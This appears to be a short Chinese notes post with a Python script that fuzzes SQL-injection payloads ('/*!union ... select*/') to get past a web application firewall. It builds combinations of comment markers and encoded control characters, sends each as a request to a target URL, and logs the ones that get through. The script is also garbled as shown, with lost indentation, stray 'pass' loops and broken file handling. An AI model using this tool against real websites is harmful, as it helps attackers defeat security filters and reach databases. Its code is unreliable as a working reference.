sql bypass waf fuzz python
从freebuf copy过来的,先保存,有空再改
#encoding=utf-8
import requests
url = "http://127.0.0.1/index.php?id=1"
Fuzz_a = ['/*!','*/','/**/','/','?','~','!','.','%','-','*','+','=']
Fuzz_b = ['']
Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
#配置fuzz字典
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
#设置请求的headers
for a in FUZZ:
pass
for b in FUZZ:
pass
for c in FUZZ:
for d in FUZZ:
pass
for e in FUZZ:
pass
PYLOAD = "/*!union"+a+b+c+d+e+"select*/ 1,2"
urlp = url+PYLOAD
res = requests.get(urlp,headers=header)
#使用for排列组合fuzz字典并请求页面
if 'flag' in res.text: #这个flag需要改,根据你测的正常页面中,有什么字段是必然出现的
print ("[*]URL:"+ urlp +"过狗!")
f=open('result.txt','a')
f.write(urlp+"n")
f.close

浙公网安备 33010602011771号